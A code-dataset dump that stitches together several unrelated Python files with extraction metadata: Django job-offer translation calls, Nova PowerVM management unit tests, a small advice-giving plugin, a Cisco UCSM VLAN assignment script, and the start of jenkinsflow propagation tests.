(['"""2+"""'], {}), "('2+')\n", (1115, 1121), True, 'from django.utils.translation import gettext as _\n'), ((1145, 1152), 'django.utils.translation.gettext', '_', (['"""3+"""'], {}), "('3+')\n", (1146, 1152), True, 'from django.utils.translation import gettext as _\n'), ((1175, 1182), 'django.utils.translation.gettext', '_', (['"""5+"""'], {}), "('5+')\n", (1176, 1182), True, 'from django.utils.translation import gettext as _\n'), ((1205, 1213), 'django.utils.translation.gettext', '_', (['"""10+"""'], {}), "('10+')\n", (1206, 1213), True, 'from django.utils.translation import gettext as _\n'), ((1321, 1332), 'django.utils.translation.gettext', '_', (['"""Remoto"""'], {}), "('Remoto')\n", (1322, 1332), True, 'from django.utils.translation import gettext as _\n'), ((1359, 1374), 'django.utils.translation.gettext', '_', (['"""Presencial"""'], {}), "('Presencial')\n", (1360, 1374), True, 'from django.utils.translation import gettext as _\n'), ((1397, 1407), 'django.utils.translation.gettext', '_', (['"""Mixto"""'], {}), "('Mixto')\n", (1398, 1407), True, 'from django.utils.translation import gettext as _\n'), ((1519, 1547), 'django.utils.translation.gettext', '_', (['"""Relación de dependencia"""'], {}), "('Relación de dependencia')\n", (1520, 1547), True, 'from django.utils.translation import gettext as _\n'), ((1584, 1603), 'django.utils.translation.gettext', '_', (['"""Monotributista"""'], {}), "('Monotributista')\n", (1585, 1603), True, 'from django.utils.translation import gettext as _\n'), ((1647, 1673), 'django.utils.translation.gettext', '_', (['"""Contractor short term"""'], {}), "('Contractor short term')\n", (1648, 1673), True, 'from django.utils.translation import gettext as _\n'), ((1715, 1740), 'django.utils.translation.gettext', '_', (['"""Contractor long term"""'], {}), "('Contractor long term')\n", (1716, 1740), True, 'from django.utils.translation import gettext as _\n'), ((1774, 1801), 'django.utils.translation.gettext', '_', (['"""Cooperativa de trabajo"""'], {}), "('Cooperativa de trabajo')\n", (1775, 1801), True, 'from django.utils.translation import gettext as _\n'), ((1833, 1844), 'django.utils.translation.gettext', '_', (['"""Estado"""'], {}), "('Estado')\n", (1834, 1844), True, 'from django.utils.translation import gettext as _\n'), ((1866, 1875), 'django.utils.translation.gettext', '_', (['"""Otra"""'], {}), "('Otra')\n", (1867, 1875), True, 'from django.utils.translation import gettext as _\n'), ((1981, 1991), 'django.utils.translation.gettext', '_', (['"""Nuevo"""'], {}), "('Nuevo')\n", (1982, 1991), True, 'from django.utils.translation import gettext as _\n'), ((2050, 2066), 'django.utils.translation.gettext', '_', (['"""Desactivada"""'], {}), "('Desactivada')\n", (2051, 2066), True, 'from django.utils.translation import gettext as _\n'), ((2098, 2116), 'django.utils.translation.gettext', '_', (['"""En moderación"""'], {}), "('En moderación')\n", (2099, 2116), True, 'from django.utils.translation import gettext as _\n'), ((2140, 2151), 'django.utils.translation.gettext', '_', (['"""Activa"""'], {}), "('Activa')\n", (2141, 2151), True, 'from django.utils.translation import gettext as _\n'), ((2179, 2193), 'django.utils.translation.gettext', '_', (['"""Rechazada"""'], {}), "('Rechazada')\n", (2180, 2193), True, 'from django.utils.translation import gettext as _\n'), ((2219, 2232), 'django.utils.translation.gettext', '_', (['"""Caducada"""'], {}), "('Caducada')\n", (2220, 2232), True, 'from django.utils.translation import gettext as _\n'), ((4609, 4662), 'django.urls.reverse', 'reverse', (['"""joboffers:view"""'], {'kwargs': "{'slug': self.slug}"}), "('joboffers:view', kwargs={'slug': self.slug})\n", (4616, 4662), False, 'from django.urls import reverse\n'), ((5163, 5198), 're.sub', 're.sub', (['"""<[^>]*>"""', '""" """', 'description'], {}), "('<[^>]*>', ' ', description)\n", (5169, 5198), False, 'import re\n'), ((5324, 5365), 'html.unescape', 'html.unescape', (['description_without_spaces'], {}), '(description_without_spaces)\n', (5337, 5365), False, 'import html\n'), ((5604, 5616), 'datetime.date.today', 'date.today', ([], {}), '()\n', (5614, 5616), False, 'from datetime import date\n'), ((6158, 6213), 'pycompanies.models.UserCompanyProfile.objects.filter', 'UserCompanyProfile.objects.filter', ([], {'company': 'self.company'}), '(company=self.company)\n', (6191, 6213), False, 'from pycompanies.models import UserCompanyProfile\n'), ((6886, 6905), 'django.utils.text.slugify', 'slugify', (['self.title'], {}), '(self.title)\n', (6893, 6905), False, 'from django.utils.text import slugify\n'), ((8341, 8356), 'django.utils.translation.gettext', '_', (['"""Moderación"""'], {}), "('Moderación')\n", (8342, 8356), True, 'from django.utils.translation import gettext as _\n'), ((8382, 8394), 'django.utils.translation.gettext', '_', (['"""Edición"""'], {}), "('Edición')\n", (8383, 8394), True, 'from django.utils.translation import gettext as _\n'), ((8414, 8423), 'django.utils.translation.gettext', '_', (['"""Spam"""'], {}), "('Spam')\n", (8415, 8423), True, 'from django.utils.translation import gettext as _\n'), ((8457, 8486), 'django.utils.translation.gettext', '_', (['"""Información insuficiente"""'], {}), "('Información insuficiente')\n", (8458, 8486), True, 'from django.utils.translation import gettext as _\n'), ((8519, 8556), 'django.utils.translation.gettext', '_', (['"""Oferta no relacionada con Python"""'], {}), "('Oferta no relacionada con Python')\n", (8520, 8556), True, 'from django.utils.translation import gettext as _\n'), ((9722, 9786), 'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""joboffers"""', 'model': '"""joboffer"""'}), "(app_label='joboffers', model='joboffer')\n", (9745, 9786), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((9817, 9888), 'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""joboffers"""', 'model': '"""joboffercomment"""'}), "(app_label='joboffers', model='joboffercomment')\n", (9840, 9888), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((9930, 10005), 'django.db.models.Q', 'models.Q', ([], {'event_type__lt': '(4)', 'object_id': 'joboffer.id', 'content_type': 'offer_ctype'}), '(event_type__lt=4, object_id=joboffer.id, content_type=offer_ctype)\n', (9938, 10005), False, 'from django.db import models\n'), ((10159, 10234), 'django.db.models.Q', 'models.Q', ([], {'object_id__in': 'offer_comment_ids', 'content_type': 'offer_comment_ctype'}), '(object_id__in=offer_comment_ids, content_type=offer_comment_ctype)\n', (10167, 10234), False, 'from django.db import models\n'), ((10777, 10810), 'json.loads', 'json.loads', (['self.object_json_repr'], {}), '(self.object_json_repr)\n', (10787, 10810), False, 'import json\n'), ((2359, 2370), 'django.utils.translation.gettext', '_', (['"""Título"""'], {}), "('Título')\n", (2360, 2370), True, 'from django.utils.translation import gettext as _\n'), ((2512, 2524), 'django.utils.translation.gettext', '_', (['"""Empresa"""'], {}), "('Empresa')\n", (2513, 2524), True, 'from django.utils.translation import gettext as _\n'), ((2650, 2660), 'django.utils.translation.gettext', '_', (['"""Lugar"""'], {}), "('Lugar')\n", (2651, 2660), True, 'from django.utils.translation import gettext as _\n'), ((2760, 2771), 'django.utils.translation.gettext', '_', (['"""E-mail"""'], {}), "('E-mail')\n", (2761, 2771), True, 'from django.utils.translation import gettext as _\n'), ((2876, 2889), 'django.utils.translation.gettext', '_', (['"""Teléfono"""'], {}), "('Teléfono')\n", (2877, 2889), True, 'from django.utils.translation import gettext as _\n'), ((2992, 3009), 'django.utils.translation.gettext', '_', (['"""URL Contacto"""'], {}), "('URL Contacto')\n", (2993, 3009), True, 'from django.utils.translation import gettext as _\n'), ((3114, 3130), 'django.utils.translation.gettext', '_', (['"""Experiencia"""'], {}), "('Experiencia')\n", (3115, 3130), True, 'from django.utils.translation import gettext as _\n'), ((3236, 3261), 'django.utils.translation.gettext', '_', (['"""Modalidad de trabajo"""'], {}), "('Modalidad de trabajo')\n", (3237, 3261), True, 'from django.utils.translation import gettext as _\n'), ((3308, 3322), 'django.utils.translation.gettext', '_', (['"""Etiquetas"""'], {}), "('Etiquetas')\n", (3309, 3322), True, 'from django.utils.translation import gettext as _\n'), ((3436, 3461), 'django.utils.translation.gettext', '_', (['"""Tipo de contratación"""'], {}), "('Tipo de contratación')\n", (3437, 3461), True, 'from django.utils.translation import gettext as _\n'), ((3547, 3566), 'django.utils.translation.gettext', '_', (['"""Rango salarial"""'], {}), "('Rango salarial')\n", (3548, 3566), True, 'from django.utils.translation import gettext as _\n'), ((3621, 3637), 'django.utils.translation.gettext', '_', (['"""Descripción"""'], {}), "('Descripción')\n", (3622, 3637), True, 'from django.utils.translation import gettext as _\n'), ((3726, 3748), 'django.utils.translation.gettext', '_', (['"""Descripción corta"""'], {}), "('Descripción corta')\n", (3727, 3748), True, 'from django.utils.translation import gettext as _\n'), ((3834, 3855), 'django.utils.translation.gettext', '_', (['"""Hora de creación"""'], {}), "('Hora de creación')\n", (3835, 3855), True, 'from django.utils.translation import gettext as _\n'), ((3987, 4002), 'django.utils.translation.gettext', '_', (['"""Creado por"""'], {}), "('Creado por')\n", (3988, 4002), True, 'from django.utils.translation import gettext as _\n'), ((4116, 4141), 'django.utils.translation.gettext', '_', (['"""Hora de Modificación"""'], {}), "('Hora de Modificación')\n", (4117, 4141), True, 'from django.utils.translation import gettext as _\n'), ((4269, 4288), 'django.utils.translation.gettext', '_', (['"""Modificado por"""'], {}), "('Modificado por')\n", (4270, 4288), True, 'from django.utils.translation import gettext as _\n'), ((4470, 4494), 'django.utils.translation.gettext', '_', (['"""Estado de la oferta"""'], {}), "('Estado de la oferta')\n", (4471, 4494), True, 'from django.utils.translation import gettext as _\n'), ((8682, 8692), 'django.utils.translation.gettext', '_', (['"""Texto"""'], {}), "('Texto')\n", (8683, 8692), True, 'from django.utils.translation import gettext as _\n'), ((8796, 8805), 'django.utils.translation.gettext', '_', (['"""Tipo"""'], {}), "('Tipo')\n", (8797, 8805), True, 'from django.utils.translation import gettext as _\n'), ((8886, 8905), 'django.utils.translation.gettext', '_', (['"""Rango salarial"""'], {}), "('Rango salarial')\n", (8887, 8905), True, 'from django.utils.translation import gettext as _\n'), ((9037, 9052), 'django.utils.translation.gettext', '_', (['"""Creado por"""'], {}), "('Creado por')\n", (9038, 9052), True, 'from django.utils.translation import gettext as _\n'), ((11396, 11427), 'json.loads', 'json.loads', (['self.changed_fields'], {}), '(self.changed_fields)\n', (11406, 11427), False, 'import json\n'), ((12652, 12671), 'django.utils.translation.gettext', '_', (['"""Tipo de Evento"""'], {}), "('Tipo de Evento')\n", (12653, 12671), True, 'from django.utils.translation import gettext as _\n'), ((12737, 12765), 'django.utils.translation.gettext', '_', (['"""Identificador de Sesión"""'], {}), "('Identificador de Sesión')\n", (12738, 12765), True, 'from django.utils.translation import gettext as _\n'), ((2385, 2407), 'django.core.validators.MinLengthValidator', 'MinLengthValidator', (['(20)'], {}), '(20)\n', (2403, 2407), False, 'from django.core.validators import MinLengthValidator\n'), ((5237, 5283), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'description_stripped_tags'], {}), "('\\\\s+', ' ', description_stripped_tags)\n", (5243, 5283), False, 'import re\n'), ((6732, 6751), 'django.db.models.aggregates.Count', 'Count', (['"""event_type"""'], {}), "('event_type')\n", (6737, 6751), False, 'from django.db.models.aggregates import Count\n'), ((7655, 7690), 'django.db.models.Q', 'models.Q', ([], {'contact_url__isnull': '(False)'}), '(contact_url__isnull=False)\n', (7663, 7690), False, 'from django.db import models\n'), ((8127, 8165), 'django.db.models.Q', 'models.Q', ([], {'remoteness': 'Remoteness.REMOTE'}), '(remoteness=Remoteness.REMOTE)\n', (8135, 8165), False, 'from django.db import models\n'), ((7442, 7478), 'django.db.models.Q', 'models.Q', ([], {'contact_mail__isnull': '(False)'}), '(contact_mail__isnull=False)\n', (7450, 7478), False, 'from django.db import models\n'), ((7548, 7585), 'django.db.models.Q', 'models.Q', ([], {'contact_phone__isnull': '(False)'}), '(contact_phone__isnull=False)\n', (7556, 7585), False, 'from django.db import models\n'), ((7960, 8023), 'django.db.models.Q', 'models.Q', ([], {'remoteness__in': '(Remoteness.HYBRID, Remoteness.OFFICE)'}), '(remoteness__in=(Remoteness.HYBRID, Remoteness.OFFICE))\n', (7968, 8023), False, 'from django.db import models\n'), ((8050, 8082), 'django.db.models.Q', 'models.Q', ([], {'location__isnull': '(False)'}), '(location__isnull=False)\n', (8058, 8082), False, 'from django.db import models\n')] |
# Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import retrying
from nova import exception
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from pypowervm.tests.test_utils import pvmhttp
from nova_powervm.virt.powervm import exception as npvmex
from nova_powervm.virt.powervm import mgmt
LPAR_HTTPRESP_FILE = "lpar.txt"
class TestMgmt(test.NoDBTestCase):
def setUp(self):
super(TestMgmt, self).setUp()
self.apt = self.useFixture(pvm_fx.AdapterFx()).adpt
lpar_http = pvmhttp.load_pvm_resp(LPAR_HTTPRESP_FILE, adapter=self.apt)
self.assertNotEqual(lpar_http, None,
"Could not load %s " % LPAR_HTTPRESP_FILE)
self.resp = lpar_http.response
@mock.patch('pypowervm.tasks.partition.get_this_partition', autospec=True)
def test_mgmt_uuid(self, mock_get_partition):
mock_get_partition.return_value = mock.Mock(uuid='mock_mgmt')
adpt = mock.Mock()
# First run should call the partition only once
self.assertEqual('mock_mgmt', mgmt.mgmt_uuid(adpt))
mock_get_partition.assert_called_once_with(adpt)
# But a subsequent call should effectively no-op
mock_get_partition.reset_mock()
self.assertEqual('mock_mgmt', mgmt.mgmt_uuid(adpt))
self.assertEqual(0, mock_get_partition.call_count)
@mock.patch('glob.glob', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
@mock.patch('os.path.realpath', autospec=True)
def test_discover_vscsi_disk(self, mock_realpath, mock_dacw, mock_glob):
scanpath = '/sys/bus/vio/devices/30000005/host*/scsi_host/host*/scan'
udid = ('275b5d5f88fa5611e48be9000098be9400'
'13fb2aa55a2d7b8d150cb1b7b6bc04d6')
devlink = ('/dev/disk/by-id/scsi-SIBM_3303_NVDISK' + udid)
mapping = mock.Mock()
mapping.client_adapter.lpar_slot_num = 5
mapping.backing_storage.udid = udid
# Realistically, first glob would return e.g. .../host0/.../host0/...
# but it doesn't matter for test purposes.
mock_glob.side_effect = [[scanpath], [devlink]]
mgmt.discover_vscsi_disk(mapping)
mock_glob.assert_has_calls(
[mock.call(scanpath), mock.call('/dev/disk/by-id/*' + udid[-32:])])
mock_dacw.assert_called_with(scanpath, 'a', '- - -')
mock_realpath.assert_called_with(devlink)
@mock.patch('retrying.retry', autospec=True)
@mock.patch('glob.glob', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
def test_discover_vscsi_disk_not_one_result(self, mock_write, mock_glob,
mock_retry):
"""Zero or more than one disk is found by discover_vscsi_disk."""
def validate_retry(kwargs):
self.assertIn('retry_on_result', kwargs)
self.assertEqual(250, kwargs['wait_fixed'])
self.assertEqual(300000, kwargs['stop_max_delay'])
def raiser(unused):
raise retrying.RetryError(mock.Mock(attempt_number=123))
def retry_passthrough(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_dev):
return _poll_for_dev
return wrapped
def retry_timeout(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_dev):
return raiser
return wrapped
udid = ('275b5d5f88fa5611e48be9000098be9400'
'13fb2aa55a2d7b8d150cb1b7b6bc04d6')
mapping = mock.Mock()
mapping.client_adapter.lpar_slot_num = 5
mapping.backing_storage.udid = udid
# No disks found
mock_retry.side_effect = retry_timeout
mock_glob.side_effect = lambda path: []
self.assertRaises(npvmex.NoDiskDiscoveryException,
mgmt.discover_vscsi_disk, mapping)
# Multiple disks found
mock_retry.side_effect = retry_passthrough
mock_glob.side_effect = [['path'], ['/dev/sde', '/dev/sdf']]
self.assertRaises(npvmex.UniqueDiskDiscoveryException,
mgmt.discover_vscsi_disk, mapping)
@mock.patch('time.sleep', autospec=True)
@mock.patch('os.path.realpath', autospec=True)
@mock.patch('os.stat', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
def test_remove_block_dev(self, mock_dacw, mock_stat, mock_realpath,
mock_sleep):
link = '/dev/link/foo'
realpath = '/dev/sde'
delpath = '/sys/block/sde/device/delete'
mock_realpath.return_value = realpath
# Good path
mock_stat.side_effect = (None, None, OSError())
mgmt.remove_block_dev(link)
mock_realpath.assert_called_with(link)
mock_stat.assert_has_calls([mock.call(realpath), mock.call(delpath),
mock.call(realpath)])
mock_dacw.assert_called_with(delpath, 'a', '1')
self.assertEqual(0, mock_sleep.call_count)
# Device param not found
mock_dacw.reset_mock()
mock_stat.reset_mock()
mock_stat.side_effect = (OSError(), None, None)
self.assertRaises(exception.InvalidDevicePath, mgmt.remove_block_dev,
link)
# stat was called once; privsep write was not called
self.assertEqual(1, mock_stat.call_count)
mock_dacw.assert_not_called()
# Delete special file not found
mock_stat.reset_mock()
mock_stat.side_effect = (None, OSError(), None)
self.assertRaises(exception.InvalidDevicePath, mgmt.remove_block_dev,
link)
# stat was called twice; privsep write was not called
self.assertEqual(2, mock_stat.call_count)
mock_dacw.assert_not_called()
@mock.patch('retrying.retry')
@mock.patch('os.path.realpath')
@mock.patch('os.stat')
@mock.patch('nova.privsep.path.writefile')
def test_remove_block_dev_timeout(self, mock_dacw, mock_stat,
mock_realpath, mock_retry):
def validate_retry(kwargs):
self.assertIn('retry_on_result', kwargs)
self.assertEqual(250, kwargs['wait_fixed'])
self.assertEqual(10000, kwargs['stop_max_delay'])
def raiser(unused):
raise retrying.RetryError(mock.Mock(attempt_number=123))
def retry_timeout(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_del):
return raiser
return wrapped
# Deletion was attempted, but device is still there
link = '/dev/link/foo'
delpath = '/sys/block/sde/device/delete'
realpath = '/dev/sde'
mock_realpath.return_value = realpath
mock_stat.side_effect = lambda path: 1
mock_retry.side_effect = retry_timeout
self.assertRaises(
npvmex.DeviceDeletionException, mgmt.remove_block_dev, link)
mock_realpath.assert_called_once_with(link)
mock_dacw.assert_called_with(delpath, 'a', '1')
| [
"mock.patch",
"mock.Mock",
"nova_powervm.virt.powervm.mgmt.discover_vscsi_disk",
"nova_powervm.virt.powervm.mgmt.remove_block_dev",
"pypowervm.tests.test_utils.pvmhttp.load_pvm_resp",
"mock.call",
"nova_powervm.virt.powervm.mgmt.mgmt_uuid",
"pypowervm.tests.test_fixtures.AdapterFx"
] | [((1344, 1417), 'mock.patch', 'mock.patch', (['"""pypowervm.tasks.partition.get_this_partition"""'], {'autospec': '(True)'}), "('pypowervm.tasks.partition.get_this_partition', autospec=True)\n", (1354, 1417), False, 'import mock\n'), ((1962, 2000), 'mock.patch', 'mock.patch', (['"""glob.glob"""'], {'autospec': '(True)'}), "('glob.glob', autospec=True)\n", (1972, 2000), False, 'import mock\n'), ((2006, 2062), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (2016, 2062), False, 'import mock\n'), ((2068, 2113), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {'autospec': '(True)'}), "('os.path.realpath', autospec=True)\n", (2078, 2113), False, 'import mock\n'), ((3025, 3068), 'mock.patch', 'mock.patch', (['"""retrying.retry"""'], {'autospec': '(True)'}), "('retrying.retry', autospec=True)\n", (3035, 3068), False, 'import mock\n'), ((3074, 3112), 'mock.patch', 'mock.patch', (['"""glob.glob"""'], {'autospec': '(True)'}), "('glob.glob', autospec=True)\n", (3084, 3112), False, 'import mock\n'), ((3118, 3174), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (3128, 3174), False, 'import mock\n'), ((4796, 4835), 'mock.patch', 'mock.patch', (['"""time.sleep"""'], {'autospec': '(True)'}), "('time.sleep', autospec=True)\n", (4806, 4835), False, 'import mock\n'), ((4841, 4886), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {'autospec': '(True)'}), "('os.path.realpath', autospec=True)\n", (4851, 4886), False, 'import mock\n'), ((4892, 4928), 'mock.patch', 'mock.patch', (['"""os.stat"""'], {'autospec': '(True)'}), "('os.stat', autospec=True)\n", (4902, 4928), False, 'import mock\n'), ((4934, 4990), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (4944, 4990), False, 'import mock\n'), ((6470, 6498), 'mock.patch', 'mock.patch', (['"""retrying.retry"""'], {}), "('retrying.retry')\n", (6480, 6498), False, 'import mock\n'), ((6504, 6534), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {}), "('os.path.realpath')\n", (6514, 6534), False, 'import mock\n'), ((6540, 6561), 'mock.patch', 'mock.patch', (['"""os.stat"""'], {}), "('os.stat')\n", (6550, 6561), False, 'import mock\n'), ((6567, 6608), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {}), "('nova.privsep.path.writefile')\n", (6577, 6608), False, 'import mock\n'), ((1122, 1181), 'pypowervm.tests.test_utils.pvmhttp.load_pvm_resp', 'pvmhttp.load_pvm_resp', (['LPAR_HTTPRESP_FILE'], {'adapter': 'self.apt'}), '(LPAR_HTTPRESP_FILE, adapter=self.apt)\n', (1143, 1181), False, 'from pypowervm.tests.test_utils import pvmhttp\n'), ((1510, 1537), 'mock.Mock', 'mock.Mock', ([], {'uuid': '"""mock_mgmt"""'}), "(uuid='mock_mgmt')\n", (1519, 1537), False, 'import mock\n'), ((1553, 1564), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (1562, 1564), False, 'import mock\n'), ((2459, 2470), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (2468, 2470), False, 'import mock\n'), ((2758, 2791), 'nova_powervm.virt.powervm.mgmt.discover_vscsi_disk', 'mgmt.discover_vscsi_disk', (['mapping'], {}), '(mapping)\n', (2782, 2791), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((4170, 4181), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (4179, 4181), False, 'import mock\n'), ((5348, 5375), 'nova_powervm.virt.powervm.mgmt.remove_block_dev', 'mgmt.remove_block_dev', (['link'], {}), '(link)\n', (5369, 5375), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((1660, 1680), 'nova_powervm.virt.powervm.mgmt.mgmt_uuid', 'mgmt.mgmt_uuid', (['adpt'], {}), '(adpt)\n', (1674, 1680), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((1875, 1895), 'nova_powervm.virt.powervm.mgmt.mgmt_uuid', 'mgmt.mgmt_uuid', (['adpt'], {}), '(adpt)\n', (1889, 1895), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((1076, 1094), 'pypowervm.tests.test_fixtures.AdapterFx', 'pvm_fx.AdapterFx', ([], {}), '()\n', (1092, 1094), True, 'from pypowervm.tests import test_fixtures as pvm_fx\n'), ((2841, 2860), 'mock.call', 'mock.call', (['scanpath'], {}), '(scanpath)\n', (2850, 2860), False, 'import mock\n'), ((2862, 2905), 'mock.call', 'mock.call', (["('/dev/disk/by-id/*' + udid[-32:])"], {}), "('/dev/disk/by-id/*' + udid[-32:])\n", (2871, 2905), False, 'import mock\n'), ((3662, 3691), 'mock.Mock', 'mock.Mock', ([], {'attempt_number': '(123)'}), '(attempt_number=123)\n', (3671, 3691), False, 'import mock\n'), ((5459, 5478), 'mock.call', 'mock.call', (['realpath'], {}), '(realpath)\n', (5468, 5478), False, 'import mock\n'), ((5480, 5498), 'mock.call', 'mock.call', (['delpath'], {}), '(delpath)\n', (5489, 5498), False, 'import mock\n'), ((5536, 5555), 'mock.call', 'mock.call', (['realpath'], {}), '(realpath)\n', (5545, 5555), False, 'import mock\n'), ((7016, 7045), 'mock.Mock', 'mock.Mock', ([], {'attempt_number': '(123)'}), '(attempt_number=123)\n', (7025, 7045), False, 'import mock\n')] |
import random
from plugin import plugin
ANSWERS = [
"No",
"Yes",
"You Can Do It!",
"I Cant Help You",
"Sorry To hear That, But You Must Forget :(",
"Keep It Up!",
"Nice",
"Dont Do It Ever Again",
"I Like It, Good Job",
"I Am Not Certain",
"Too Bad For You, Try To Find Something Else To Do And Enjoy",
"Time Will Pass And You Will Forget",
"Dont Do It",
"Do It",
"Never Ask Me About That Again",
"I Cant Give Advice Now I Am Sleepy",
"Sorry I Cant Hear This Language",
"Sorry But Your Question Does Not Make Sense"
]
@plugin("give me advice")
def advice(jarvis, s):
while True:
question = input("Ask Me A Question : ").strip()
if len(question) > 0 and question[-1] == '?':
break
else:
print("Questions should end with a question mark: ?")
while True:
random_idx = random.randint(0, len(ANSWERS))
print(ANSWERS[random_idx])
while True:
desire = input("Was This In Context? (Y/N) : ")
if desire.strip().lower() == 'n':
print("Its A Pitty :( I'll Try Again!")
break
elif desire.strip().lower() == 'y':
print("Good To hear! Happy To Advice You!")
print("Good Bye!")
return
| [
"plugin.plugin"
] | [((556, 580), 'plugin.plugin', 'plugin', (['"""give me advice"""'], {}), "('give me advice')\n", (562, 580), False, 'from plugin import plugin\n')] |
import argparse
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.mometa.vnic.VnicEtherIf import VnicEtherIf
from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan
parser = argparse.ArgumentParser()
parser.add_argument('ucsm_ip')
parser.add_argument('username')
parser.add_argument('password')
parser.add_argument('sp_name')
parser.add_argument('vlan')
parser.add_argument('--remove', action='store_true',
help=("Remove the service profile with name"))
def connect_to_ucsm(args):
handle = UcsHandle(args.ucsm_ip, args.username, args.password)
handle.login()
return handle
def assign_vlan_to_sp_vnic(handle, args):
# Remove any existing ironic-<vlan> vifs from this UCSM server
existing_ironic_vifs = handle.query_classid(
'VnicEtherIf',
filter_str=(
'(name, ".*ironic-.*") and (dn, ".*{0}.*")'.format(args.sp_name))
)
for vif in existing_ironic_vifs:
handle.remove_mo(vif)
handle.commit()
# Add the vlan to UCSM globally if it doesn't already exist
vlan = handle.query_dn('fabric/lan/net-ironic-{0}'.format(args.vlan))
if not vlan:
vp1 = handle.query_dn("fabric/lan")
handle.add_mo(FabricVlan(vp1, name="ironic-{0}".format(args.vlan),
id=args.vlan))
handle.commit()
# Add the the VLAN as the default network for the first NIC on the server
eth0 = handle.query_classid(
'VnicEther', filter_str='(dn, ".*{0}.*")'.format(args.sp_name))[0]
VnicEtherIf(parent_mo_or_dn=eth0, default_net="yes",
name="ironic-{0}".format(args.vlan))
handle.set_mo(eth0)
handle.commit()
if __name__ == '__main__':
args = parser.parse_args()
handle = connect_to_ucsm(args)
assign_vlan_to_sp_vnic(handle, args)
| [
"ucsmsdk.ucshandle.UcsHandle",
"argparse.ArgumentParser"
] | [((178, 203), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (201, 203), False, 'import argparse\n'), ((520, 573), 'ucsmsdk.ucshandle.UcsHandle', 'UcsHandle', (['args.ucsm_ip', 'args.username', 'args.password'], {}), '(args.ucsm_ip, args.username, args.password)\n', (529, 573), False, 'from ucsmsdk.ucshandle import UcsHandle\n')] |
# Copyright (c) 2012 - 2015 <NAME>, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from pytest import raises
from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult
from .framework import api_select
from .framework.utils import pre_existing_fake_cli
def test_propagation_warn_only_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j12_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2, serial=True)
api.job('j13', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl1:
ctrl1.invoke('j11')
ctrl1.invoke('j12_fail')
ctrl1.invoke('j13')
assert ctrl1.result == BuildResult.UNSTABLE
# Note: the fact that no error was raised also implies that the failure didn't propagate as failure
def test_propagation_warn_only_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j1_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j2', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl1:
ctrl1.invoke('j1_fail')
ctrl1.invoke('j2')
def test_propagation_warn_only_nested_serial_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.parallel(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
